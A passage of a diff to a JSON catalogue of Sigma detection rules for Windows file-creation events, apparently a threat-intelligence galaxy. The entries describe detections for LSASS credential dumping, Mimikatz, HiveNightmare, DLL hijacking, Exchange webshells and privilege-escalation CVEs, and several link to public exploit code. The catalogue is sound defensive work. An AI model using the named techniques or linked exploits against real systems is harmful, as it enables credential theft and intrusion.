"https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ], + "creation_date": "2021/07/16", + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "author": "Sittikorn S", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/11/22", + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": 
"CVE-2021-44077 POC Default Dropped File", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ], + "creation_date": "2022/06/06", + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ], + "creation_date": "2022/04/13", + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "value": "Powerup Write Hijack DLL", + 
"meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" + ], + "creation_date": "2021/08/21", + "filename": "file_event_win_detect_powerup_dllhijacking.yml", + "author": "Subhash Popuri (@pbssubhash)", + "level": "high", + "falsepositive": [ + "Any powershell script that creates bat files" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/07/30", + "filename": "file_event_win_dll_sideloading_space_path.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under 
C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Persistence Via ErrorHandler.Cmd", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/09", + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2022/10/01", + "filename": "file_event_win_exchange_webshell_drop.yml", + "author": "Florian Roth (rule), MSTI (query, idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file type dropped by an Exchange 
component in IIS", + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" + ], + "creation_date": "2022/10/04", + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename", + "meta": { + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2018/07/24", + "filename": "file_event_win_ghostpack_safetykatz.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop 
support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "value": "GoToAssist Temporary Installation Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "file_event_win_gotoopener_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "value": "Dumpert Process Dumper Default File", + "meta": { + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/02/04", + "filename": "file_event_win_hack_dumpert.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Very 
unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" + ], + "creation_date": "2021/07/23", + "filename": "file_event_win_hivenightmare_file_exports.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/11/29", + "filename": "file_event_win_hktl_nppspy.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to create a DLL file to a known 
desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], + "creation_date": "2022/10/21", + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "TeamViewer_Desktop.exe is create during install", + "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/01/28", + "filename": "file_event_win_install_teamviewer_desktop.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + 
} + }, + { + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts", + "meta": { + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/10/24", + "filename": "file_event_win_inveigh_artefacts.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\u201ciphlpapi.dll\u201d) is sideloaded\n", + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "meta": { + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/12", + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders", + "meta": { + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2022/07/30", + "filename": "file_event_win_iso_file_mount.yml", + "author": "@sam0x90", + "level": "high", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/11", + "filename": 
"file_event_win_iso_file_recent.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write executables to disk", + "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "value": "Legitimate Application Dropped Executable", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_exe.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write 
scripts to disk", + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files", + "meta": { + "refs": [ + "https://www.google.com/search?q=procdump+lsass", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/11/15", + "filename": "file_event_win_lsass_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/22", + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "high", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump", + "meta": { + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/06/27", + "filename": "file_event_win_lsass_werfault_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A office file with macro is created from a commandline or a script", + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2022/01/23", + "filename": "file_event_win_macro_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "file_event_win_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Octopus Scanner Malware.", + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware", + "meta": { + "refs": [ + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ 
+ "attack.t1195", + "attack.t1195.001" + ], + "creation_date": "2020/06/09", + "filename": "file_event_win_mal_octopus_scanner.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/10/25", + "filename": "file_event_win_mal_vhd_download.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "medium", + "falsepositive": [ + "Legitimate user creation" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation", + "meta": { + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558" + ], + "creation_date": "2021/11/08", + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": 
"file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation", + "meta": { + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2021/12/20", + "filename": "file_event_win_mimimaktz_memssp_log_file.yml", + "author": "David ANDRE", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit", + "meta": { + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2021/05/06", + "filename": "file_event_win_moriya_rootkit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory", + "meta": { + "refs": [ + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + 
